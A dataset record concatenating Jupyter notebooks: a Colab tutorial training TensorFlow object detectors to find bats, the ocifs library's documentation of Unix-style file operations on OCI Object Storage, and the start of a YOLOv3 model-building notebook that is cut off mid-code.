version\nprint('Tensorflow Version: %s' % tf.__version__)\n\n# Check available GPU devices\nprint('The following GPU devices are available: %s' % tf.test.gpu_device_name())\n\n# Define functions\n\n# Read in data file exported from \"Combine output files A-D\" block above\ndef read_datafile(fpath, sep=\"\\t\", header=0, disp_head=True):\n \"\"\"\n Defaults to tab-separated data files with header in row 0\n \"\"\"\n try:\n df = pd.read_csv(fpath, sep=sep, header=header)\n if disp_head:\n print(\"Data header: \\n\", df.head())\n except FileNotFoundError as e:\n raise Exception(\"File not found: Enter the path to your file in form field and re-run\").with_traceback(e.__traceback__)\n \n return df\n\n# To load image in and do something with it\ndef load_img(path): \n img = tf.io.read_file(path)\n img = tf.image.decode_jpeg(img, channels=3)\n return img\n\n# To display loaded image\ndef display_image(image):\n fig = plt.figure(figsize=(20, 15))\n plt.grid(False)\n plt.imshow(image)\n\n# For reading in images from URL and passing through TF models for inference\ndef download_and_resize_image(url, new_width=256, new_height=256, #From URL\n display=False):\n _, filename = tempfile.mkstemp(suffix=\".jpg\")\n response = urlopen(url)\n image_data = response.read()\n image_data = BytesIO(image_data)\n pil_image = Image.open(image_data)\n im_h, im_w = pil_image.size\n pil_image = ImageOps.fit(pil_image, (new_width, new_height), Image.ANTIALIAS)\n pil_image_rgb = pil_image.convert(\"RGB\")\n pil_image_rgb.save(filename, format=\"JPEG\", quality=90)\n #print(\"Image downloaded to %s.\" % filename)\n if display:\n display_image(pil_image)\n return filename, im_h, im_w", "_____no_output_____" ], [ "# Download, compile and build the Tensorflow Object Detection API (takes 4-9 minutes)\n\n# TO DO: Type in the path to your working directory in form field to right\nbasewd = \"/content/drive/MyDrive/train\" #@param {type:\"string\"}\n%cd $basewd\n\n# Set up directory for TF2 Model Garden\n# TO DO: Type in the folder you would like to contain TF2\nfolder = \"tf2\" #@param {type:\"string\"}\nif not os.path.exists(folder):\n os.makedirs(folder)\n %cd $folder\n os.makedirs(\"tf_models\")\n %cd tf_models\n # Clone the Tensorflow Model Garden\n !git clone --depth 1 https://github.com/tensorflow/models/\n %cd ../..\n\n# Build the Object Detection API\nwd = basewd + '/' + folder\n%cd $wd\n!cd tf_models/models/research/ && protoc object_detection/protos/*.proto --python_out=. && cp object_detection/packages/tf2/setup.py . && python -m pip install .", "_____no_output_____" ] ], [ [ "## Model preparation (only run once)\n---\nThese blocks download and set-up files needed for training object detectors. After running once, you can train and re-train as many times as you'd like.", "_____no_output_____" ], [ "### Download and extract pre-trained models ", "_____no_output_____" ] ], [ [ "# Download pre-trained models from Tensorflow Object Detection Model Zoo\n# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf2_detection_zoo.md\n# SSD and Faster-RCNN used as options below\n# modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\n\nimport shutil\nimport glob\nimport tarfile\n\n# CD to folder where TF models are installed (tf2)\n%cd $wd\n\n# Make folders for your training files for each model\n# Faster RCNN Model\nif not (os.path.exists('tf_models/train_demo')):\n !mkdir tf_models/train_demo\nif not (os.path.exists('tf_models/train_demo/rcnn')):\n !mkdir tf_models/train_demo/rcnn\nif not (os.path.exists('tf_models/train_demo/rcnn/pretrained_model')):\n !mkdir tf_models/train_demo/rcnn/pretrained_model\nif not (os.path.exists('tf_models/train_demo/rcnn/finetuned_model')):\n !mkdir tf_models/train_demo/rcnn/finetuned_model\nif not (os.path.exists('tf_models/train_demo/rcnn/trained')):\n !mkdir tf_models/train_demo/rcnn/trained\n# Download the model\nMODEL = 'faster_rcnn_resnet50_v1_640x640_coco17_tpu-8'\nMODEL_FILE = MODEL + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'\nDEST_DIR = 'tf_models/train_demo/rcnn/pretrained_model'\nif not (os.path.exists(MODEL_FILE)):\n urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n\ntar = tarfile.open(MODEL_FILE)\ntar.extractall()\ntar.close()\n\nos.remove(MODEL_FILE)\nif (os.path.exists(DEST_DIR)):\n shutil.rmtree(DEST_DIR)\nos.rename(MODEL, DEST_DIR)\n\n# SSD Model\nif not (os.path.exists('tf_models/train_demo/ssd')):\n !mkdir tf_models/train_demo/ssd\nif not (os.path.exists('tf_models/train_demo/ssd/pretrained_model')):\n !mkdir tf_models/train_demo/ssd/pretrained_model\nif not (os.path.exists('tf_models/train_demo/ssd/finetuned_model')):\n !mkdir tf_models/train_demo/ssd/finetuned_model\nif not (os.path.exists('tf_models/train_demo/ssd/trained')):\n !mkdir tf_models/train_demo/ssd/trained\n# Download the model\nMODEL = 'ssd_mobilenet_v2_320x320_coco17_tpu-8'\nMODEL_FILE = MODEL + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'\nDEST_DIR = 'tf_models/train_demo/ssd/pretrained_model'\nif not (os.path.exists(MODEL_FILE)):\n urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n\ntar = tarfile.open(MODEL_FILE)\ntar.extractall()\ntar.close()\n\nos.remove(MODEL_FILE)\nif (os.path.exists(DEST_DIR)):\n shutil.rmtree(DEST_DIR)\nos.rename(MODEL, DEST_DIR)", "_____no_output_____" ] ], [ [ "### Convert training data to tf.record format", "_____no_output_____" ], [ "1) Download generate_tfrecord.py using code block below\n\n2) Open the Colab file explorer on the right and navigate to your current working directory\n\n3) Double click on generate_tfrecord.py to open it in the Colab text editor.\n\n4) Modify the file for your train dataset: \n* update label names to the class(es) of interest at line 31 (Chiroptera)\n # TO-DO replace this with label map\n def class_text_to_int(row_label):\n if row_label == 'Chiroptera':\n return 1\n else:\n None\n* update the filepath where you want your train tf.record file to save at line 85\n # TO-DO replace path with your filepath\n def main(_):\n writer = tf.python_io.TFRecordWriter('/content/drive/MyDrive/[yourfilepath]/tf.record')\n\n5) Close Colab text editor and proceed with steps below to generate tf.record files for your test and train datasets", "_____no_output_____" ] ], [ [ "# Download chiroptera_generate_tfrecord.py to your wd in Google Drive\n# Follow directions above to modify the file for your dataset\n!gdown --id 1fVXeuk7ALHTlTLK3GGH8p6fMHuuWt1Sr", "_____no_output_____" ], [ "# Convert crops_test to tf.record format for test data\n# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html\n\n# TO DO: Update file paths in form fields\ncsv_input = \"/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_test_notaug_oob_rem_fin.csv\" #@param {type:\"string\"}\noutput_path = \"/content/drive/MyDrive/train/tf2/test_images/tf.record\" #@param {type:\"string\"}\ntest_image_dir = \"/content/drive/MyDrive/train/tf2/test_images\" #@param {type:\"string\"}\n\n!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$test_image_dir", "_____no_output_____" ], [ "# Move tf.record for test images to test images directory\n!mv tf.record $image_dir", "_____no_output_____" ], [ "# Convert crops_train to tf.record format for train data\n# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html\n\n# TO DO: Update file paths in form fields\ncsv_input = \"/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_train_aug_oob_rem_fin.csv\" #@param {type:\"string\"}\noutput_path = \"/content/drive/MyDrive/train/tf2/images/tf.record\" #@param {type:\"string\"}\ntrain_image_dir = \"/content/drive/MyDrive/train/tf2/images\" #@param {type:\"string\"}\nglobal image_dir\n\n!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$train_image_dir", "_____no_output_____" ], [ "# Move tf.record for training images to train images directory\n!mv tf.record $image_dir", "_____no_output_____" ] ], [ [ "### Make label map for class Chiroptera", "_____no_output_____" ] ], [ [ "%%writefile labelmap.pbtxt\nitem {\n id: 1\n name: 'Chiroptera'\n}", "_____no_output_____" ] ], [ [ "### Modify model config files for training Faster-RCNN and SSD with your dataset", "_____no_output_____" ], [ "If you have errors with training, check the pipline_config_path and model_dir in the config files for R-FCN or Faster-RCNN model", "_____no_output_____" ] ], [ [ "# Adjust model config file based on training/testing datasets\n# Modified from https://stackoverflow.com/a/63645324\nfrom google.protobuf import text_format\nfrom object_detection.protos import pipeline_pb2\n%cd $wd\n\n# TO DO: Adjust parameters ## add form fields here\nfilter = \"Chiroptera\" #@param {type:\"string\"}\nconfig_basepath = \"tf_models/train_demo/\" #@param {type:\"string\"}\nlabel_map = 'labelmap.pbtxt'\ntrain_tfrecord_path = \"/content/drive/MyDrive/train/tf2/images/tf.record\" #@param {type:\"string\"}\ntest_tfrecord_path = \"/content/drive/MyDrive/train/tf2/test_images/tf.record\" #@param {type:\"string\"}\nft_ckpt_basepath = \"/content/drive/MyDrive/train/tf2/tf_models/train_demo/\" #@param {type:\"string\"}\nft_ckpt_type = \"detection\" #@param [\"detection\", \"classification\"]\nnum_classes = 1 #@param\nbatch_size = 1 #@param [\"1\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\"] {type:\"raw\"}\n\n# Define pipeline for modifying model config files\n\ndef read_config(model_config):\n if 'rcnn/' in model_config:\n model_ckpt = 'rcnn/pretrained_model/checkpoint/ckpt-0'\n elif 'ssd/' in model_config:\n model_ckpt = 'ssd/pretrained_model/checkpoint/ckpt-0'\n config_fpath = config_basepath + model_config\n pipeline = pipeline_pb2.TrainEvalPipelineConfig() \n with tf.io.gfile.GFile(config_fpath, \"r\") as f: \n proto_str = f.read() \n text_format.Merge(proto_str, pipeline)\n return pipeline, model_ckpt, config_fpath\n\ndef modify_config(pipeline, model_ckpt, ft_ckpt_basepath):\n finetune_checkpoint = ft_ckpt_basepath + model_ckpt\n pipeline.model.faster_rcnn.num_classes = num_classes\n pipeline.train_config.fine_tune_checkpoint = finetune_checkpoint\n pipeline.train_config.fine_tune_checkpoint_type = ft_ckpt_type\n pipeline.train_config.batch_size = batch_size\n pipeline.train_config.use_bfloat16 = False # True only if training on TPU\n\n pipeline.train_input_reader.label_map_path = label_map\n pipeline.train_input_reader.tf_record_input_reader.input_path[0] = train_tfrecord_path\n\n pipeline.eval_input_reader[0].label_map_path = label_map\n pipeline.eval_input_reader[0].tf_record_input_reader.input_path[0] = test_tfrecord_path\n\n return pipeline\n\ndef write_config(pipeline, config_fpath):\n config_outfpath = os.path.splitext(config_fpath)[0] + '_' + filter + '.config'\n config_text = text_format.MessageToString(pipeline) \n with tf.io.gfile.GFile(config_outfpath, \"wb\") as f: \n f.write(config_text)\n \n return config_outfpath\n\ndef setup_pipeline(model_config, ft_ckpt_basepath):\n print('\\n Modifying model config file for {}'.format(model_config))\n pipeline, model_ckpt, config_fpath = read_config(model_config)\n pipeline = modify_config(pipeline, model_ckpt, ft_ckpt_basepath)\n config_outfpath = write_config(pipeline, config_fpath)\n print(' Modifed model config file saved to {}'.format(config_outfpath))\n if config_outfpath:\n return \"Success!\"\n else:\n return \"Fail: try again\"\n\n# Modify model configs\nmodel_configs = ['rcnn/pretrained_model/pipeline.config', 'ssd/pretrained_model/pipeline.config']\n[setup_pipeline(model_config, ft_ckpt_basepath) for model_config in model_configs]", "_____no_output_____" ] ], [ [ "## Train\n--- ", "_____no_output_____" ] ], [ [ "# Determine how many train and eval steps to use based on dataset size\n\n# TO DO: Only need to update path if you didn't just run \"Model Preparation\" block above\ntry: \n train_image_dir\nexcept NameError:\n train_image_dir = \"/content/drive/MyDrive/train/tf2/images\" #@param {type:\"string\"}\nexamples = len(os.listdir(train_image_dir))\nprint(\"Number of train examples: \\n\", examples)\n\n# Get the number of testing examples\n# TO DO: Only need to update path if you didn't just run \"Model Preparation\" block above\ntry:\n test_image_dir\nexcept NameError:\n test_image_dir = \"/content/drive/MyDrive/train/tf2/test_images\" #@param {type:\"string\"}\ntest_examples = len(os.listdir(test_image_dir))\nprint(\"Number of test examples: \\n\", test_examples)\n\n# Get the training batch size\n# TO DO: Only need to update value if you didn't just run \"Model Preparation\" block above\ntry:\n batch_size\nexcept NameError:\n batch_size = 1 #@param [\"1\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\"] {type:\"raw\"}\nprint(\"Batch size: \\n\", batch_size)\n\n# Calculate roughly how many steps to use for training and testing\nsteps_per_epoch = examples / batch_size\nnum_eval_steps = test_examples / batch_size\nprint(\"Number of steps per training epoch: \\n\", int(steps_per_epoch))\nprint(\"Number of evaluation steps: \\n\", int(num_eval_steps))", "_____no_output_____" ], [ "# TO DO: Choose how many epochs to train for\nepochs = 410 #@param {type:\"slider\", min:10, max:1000, step:100}\nnum_train_steps = int(epochs * steps_per_epoch)\nnum_eval_steps = int(num_eval_steps)\n# TO DO: Choose paths for RCNN or SSD model\npipeline_config_path = \"tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config\" #@param [\"tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config\", \"tf_models/train_demo/ssd/pretrained_model/pipeline_Chiroptera.config\"]\nmodel_dir = \"tf_models/train_demo/rcnn/trained\" #@param [\"tf_models/train_demo/rcnn/trained\", \"tf_models/train_demo/ssd/trained\"]\noutput_directory = \"tf_models/train_demo/rcnn/finetuned_model\" #@param [\"tf_models/train_demo/rcnn/finetuned_model\", \"tf_models/train_demo/ssd/finetuned_model\"]\ntrained_checkpoint_dir = \"tf_models/train_demo/rcnn/trained\" #@param [\"tf_models/train_demo/rcnn/trained\", \"tf_models/train_demo/ssd/trained\"] {allow-input: true}\n\n# Save vars to environment for access with cmd line tools below\nos.environ[\"trained_checkpoint_dir\"] = \"trained_checkpoint_dir\"\nos.environ[\"num_train_steps\"] = \"num_train_steps\"\nos.environ[\"num_eval_steps\"] = \"num_eval_steps\"\nos.environ[\"pipeline_config_path\"] = \"pipeline_config_path\"\nos.environ[\"model_dir\"] = \"model_dir\"\nos.environ[\"output_directory\"] = \"output_directory\"", "_____no_output_____" ], [ "# Optional: Visualize training progress with Tensorboard\n\n# Load the TensorBoard notebook extension\n%load_ext tensorboard\n# Log training progress using TensorBoard\n%tensorboard --logdir $model_dir", "_____no_output_____" ], [ "# Actual training\n# Note: You can change the number of epochs in code block below and re-run to train longer\n# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\nmatplotlib.use('Agg')\n%cd $wd\n\n!python tf_models/models/research/object_detection/model_main_tf2.py \\\n --alsologtostderr \\\n --num_train_steps=$num_train_steps \\\n --num_eval_steps=$num_eval_steps \\\n --pipeline_config_path=$pipeline_config_path \\\n --model_dir=$model_dir ", "_____no_output_____" ], [ "# Export trained model\n# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\n%cd $wd\n\n# Save the model\n!python tf_models/models/research/object_detection/exporter_main_v2.py \\\n --input_type image_tensor \\\n --pipeline_config_path=$pipeline_config_path \\\n --trained_checkpoint_dir=$trained_checkpoint_dir \\\n --output_directory=$output_directory", "_____no_output_____" ], [ "# Evaluate trained model to get mAP and IoU stats for COCO 2017\n# Change pipeline_config_path and checkpoint_dir when switching between SSD and Faster-RCNN models\nmatplotlib.use('Agg')\n\n!python tf_models/models/research/object_detection/model_main_tf2.py \\\n --alsologtostderr \\\n --model_dir=$model_dir \\\n --pipeline_config_path=$pipeline_config_path \\\n --checkpoint_dir=$trained_checkpoint_dir", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb1f714112377c17096666e379766783df699980
10,710
ipynb
Jupyter Notebook
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
docs/source/unix-operations.ipynb
LaudateCorpus1/ocifs
368bf90a5e58fa8641cf9a114d793814e5a3e638
[ "UPL-1.0", "BSD-3-Clause" ]
null
null
null
26.842105
379
0.569561
[ [ [ "Copyright (c) 2021, 2022 Oracle and/or its affiliates.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/", "_____no_output_____" ], [ "## Unix Operations", "_____no_output_____" ], [ "_Important: The ocifs SDK isn't a one-to-one adaptor of OCI Object Storage and UNIX filesystem operations. It's a set of convenient wrappings to assist Pandas in natively reading from Object Storage. It supports many of the common UNIX functions, and many of the Object Storage API though not all._\n\nFollowing are examples of some of the most popular filesystem and file methods. First, you must instantiate your region-specific filesystem instance:", "_____no_output_____" ] ], [ [ "from ocifs import OCIFileSystem\n\nfs = OCIFileSystem(config=\"~/.oci/config\")", "_____no_output_____" ] ], [ [ "### Filesystem Operations\n\n#### list\nList the files in a bucket or subdirectory using `ls`:", "_____no_output_____" ] ], [ [ "fs.ls(\"bucket@namespace/\")\n# ['bucket@namespace/file.txt', \n# 'bucket@namespace/data.csv', \n# 'bucket@namespace/folder1/', \n# 'bucket@namespace/folder2/']", "_____no_output_____" ] ], [ [ "`list` has the following args: 1) `compartment_id`: a specific compartment from which to list. 2)`detail`: If true, return a list of dictionaries with various details about each object. 3)`refresh`: If true, ignore the cache and pull fresh.", "_____no_output_____" ] ], [ [ "fs.ls(\"bucket@namespace/\", detail=True)\n# [{'name': 'bucket@namespace/file.txt', \n# 'etag': 'abcdefghijklmnop',\n# 'type': 'file',\n# 'timeCreated': <timestamp when artifact created>,\n# ... },\n# ...\n# ]", "_____no_output_____" ] ], [ [ "#### touch\nThe UNIX `touch` command creates empty files in Object Storage. The `data` parameter accepts a bytestream and writes it to the new file.", "_____no_output_____" ] ], [ [ "fs.touch(\"bucket@namespace/newfile\", data=b\"Hello World!\")", "_____no_output_____" ], [ "fs.cat(\"bucket@namespace/newfile\")\n# \"Hello World!\"", "_____no_output_____" ] ], [ [ "#### copy\nThe `copy` method is a popular UNIX method, and it has a special role in ocifs as the only method capable of cross-tenancy calls. Your IAM Policy must permit you to read and write cross-region to use the `copy` method cross-region. Note: Another benefit of `copy` is that it can move large data between locations in Object Storage without needing to store anything locally.", "_____no_output_____" ] ], [ [ "fs.copy(\"bucket@namespace/newfile\", \"bucket@namespace/newfile-sydney\",\n destination_region=\"ap-sydney-1\")", "_____no_output_____" ] ], [ [ "#### rm\nThe `rm` method is another essential UNIX filesystem method. It accepts one additional argument (beyond the path), `recursive`. When `recursive=True`, it is equivalent to an `rm -rf` command. It deletes all files underneath the prefix.", "_____no_output_____" ] ], [ [ "fs.exists(\"oci://bucket@namespace/folder/file\")\n# True", "_____no_output_____" ], [ "fs.rm(\"oci://bucket@namespace/folder\", recursive=True)", "_____no_output_____" ], [ "fs.exists(\"oci://bucket@namespace/folder/file\")\n# False", "_____no_output_____" ] ], [ [ "#### glob\nFsspec implementations, including ocifs, support UNIX glob patterns, see [Globbing](https://man7.org/linux/man-pages/man7/glob.7.html).", "_____no_output_____" ] ], [ [ "fs.glob(\"oci://bucket@namespace/folder/*.csv\")\n# [\"bucket@namespace/folder/part1.csv\", \"bucket@namespace/folder/part2.csv\"]", "_____no_output_____" ] ], [ [ "Dask has special support for reading from and writing to a set of files using glob expressions (Pandas doesn't support glob), see [Dask's Glob support](https://docs.dask.org/en/latest/remote-data-services.html).", "_____no_output_____" ] ], [ [ "from dask import dataframe as dd\n\nddf = dd.read_csv(\"oci://bucket@namespace/folder/*.csv\")\nddf.to_csv(\"oci://bucket@namespace/folder_copy/*.csv\")", "_____no_output_____" ] ], [ [ "#### walk\n\nUse the UNIX `walk` method for iterating through the subdirectories of a given path. This is a valuable method for determining every file within a bucket or folder.", "_____no_output_____" ] ], [ [ "fs.walk(\"oci://bucket@namespace/folder\")\n# [\"bucket@namespace/folder/part1.csv\", \"bucket@namespace/folder/part2.csv\",\n# \"bucket@namespace/folder/subdir/file1.csv\", \"bucket@namespace/folder/subdir/file2.csv\"]", "_____no_output_____" ] ], [ [ "#### open\nThis method opens a file and returns an `OCIFile` object. There are examples of what you can do with an `OCIFile` in the next section.", "_____no_output_____" ], [ "### File Operations\nAfter calling open, you get an `OCIFile` object, which is subclassed from fsspec's `AbstractBufferedFile`. This file object can do almost everything a UNIX file can. Following are a few examples, see [a full list of methods](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile).", "_____no_output_____" ], [ "#### read\nThe `read` method works exactly as you would expect with a UNIX file:", "_____no_output_____" ] ], [ [ "import fsspec\n\nwith fsspec.open(\"oci://bucket@namespace/folder/file\", 'rb') as f:\n buffer = f.read()", "_____no_output_____" ], [ "with fs.open(\"oci://bucket@namespace/folder/file\", 'rb') as f:\n buffer = f.read()", "_____no_output_____" ], [ "file = fs.open(\"oci://bucket@namespace/folder/file\")\nbuffer = file.read()\nfile.close()", "_____no_output_____" ] ], [ [ "#### seek\nThe `seek` method is also valuable in navigating files:", "_____no_output_____" ] ], [ [ "fs.touch(\"bucket@namespace/newfile\", data=b\"Hello World!\")\nwith fs.open(\"bucket@namespace/newfile\") as f:\n f.seek(3)\n print(f.read(1))\n f.seek(0)\n print(f.read(1))\n\n# l\n# H", "_____no_output_____" ] ], [ [ "#### write\nYou can use the `write` operation:", "_____no_output_____" ] ], [ [ "with fsspec.open(\"oci://bucket@namespace/newfile\", 'wb') as f:\n buffer = f.write(b\"new text\")\n \nwith fsspec.open(\"oci://bucket@namespace/newfile\", 'rb') as f:\n assert f.read() == b\"new text\"", "_____no_output_____" ] ], [ [ "### Learn More\nThere are many more operations that you can use with `ocifs`, see the [AbstractBufferedFile spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile) and the [AbstractFileSystem spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractFileSystem).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1f741df969338a7c1ccdfd51b55cba71ad8071
34,358
ipynb
Jupyter Notebook
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
1
2021-02-18T02:16:17.000Z
2021-02-18T02:16:17.000Z
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
null
null
null
experiments/YOLOv3/PART2_Yolov3_Object_Detection.ipynb
moeraza/juice-box
6bf9ae9bf95ebc68ef0620466467e97ff4260774
[ "MIT" ]
null
null
null
39.356243
146
0.502212
[ [ [ "## **Yolov3 Algorithm**", "_____no_output_____" ] ], [ [ "import struct\nimport numpy as np\nimport pandas as pd\nimport os\nfrom keras.layers import Conv2D\nfrom keras.layers import Input\nfrom keras.layers import BatchNormalization\nfrom keras.layers import LeakyReLU\nfrom keras.layers import ZeroPadding2D\nfrom keras.layers import UpSampling2D\nfrom keras.layers.merge import add, concatenate\nfrom keras.models import Model", "_____no_output_____" ] ], [ [ "**Access Google Drive**", "_____no_output_____" ] ], [ [ "# Load the Drive helper and mount\nfrom google.colab import drive\n\ndrive.mount('/content/drive')", "Drive already mounted at /content/drive; to attempt to forcibly remount, call drive.mount(\"/content/drive\", force_remount=True).\n" ] ], [ [ "**Residual Block** \n\nformula: y=F(x) + x", "_____no_output_____" ] ], [ [ "def _conv_block(inp, convs, skip=True):\n\tx = inp\n\tcount = 0\n\tfor conv in convs:\n\t\tif count == (len(convs) - 2) and skip:\n\t\t\tskip_connection = x\n\t\tcount += 1\n\t\tif conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) #padding as darknet prefer left and top\n\t\tx = Conv2D(conv['filter'],\n\t\t\t\t conv['kernel'],\n\t\t\t\t strides=conv['stride'],\n\t\t\t\t padding='valid' if conv['stride'] > 1 else 'same', # padding as darknet prefer left and top\n\t\t\t\t name='conv_' + str(conv['layer_idx']),\n\t\t\t\t use_bias=False if conv['bnorm'] else True)(x)\n\t\tif conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']))(x)\n\t\tif conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']))(x)\n\treturn add([skip_connection, x]) if skip else x", "_____no_output_____" ] ], [ [ "**Create Yolov3 Architecture**\n\nThree output layers: 82, 94, 106", "_____no_output_____" ] ], [ [ "def make_yolov3_model():\n\tinput_image = Input(shape=(None, None, 3))\n\t# Layer 0 => 4\n\tx = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},\n\t\t\t\t\t\t\t\t {'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},\n\t\t\t\t\t\t\t\t {'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},\n\t\t\t\t\t\t\t\t {'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}])\n\t# Layer 5 => 8\n\tx = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},\n\t\t\t\t\t\t{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}])\n\t# Layer 9 => 11\n\tx = _conv_block(x, [{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}])\n\t# Layer 12 => 15\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},\n\t\t\t\t\t\t{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}])\n\t# Layer 16 => 36\n\tfor i in range(7):\n\t\tx = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},\n\t\t\t\t\t\t\t{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}])\n\tskip_36 = x\n\t# Layer 37 => 40\n\tx = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}])\n\t# Layer 41 => 61\n\tfor i in range(7):\n\t\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},\n\t\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}])\n\tskip_61 = x\n\t# Layer 62 => 65\n\tx = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}])\n\t# Layer 66 => 74\n\tfor i in range(3):\n\t\tx = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},\n\t\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}])\n\t# Layer 75 => 79\n\tx = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},\n\t\t\t\t\t\t{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 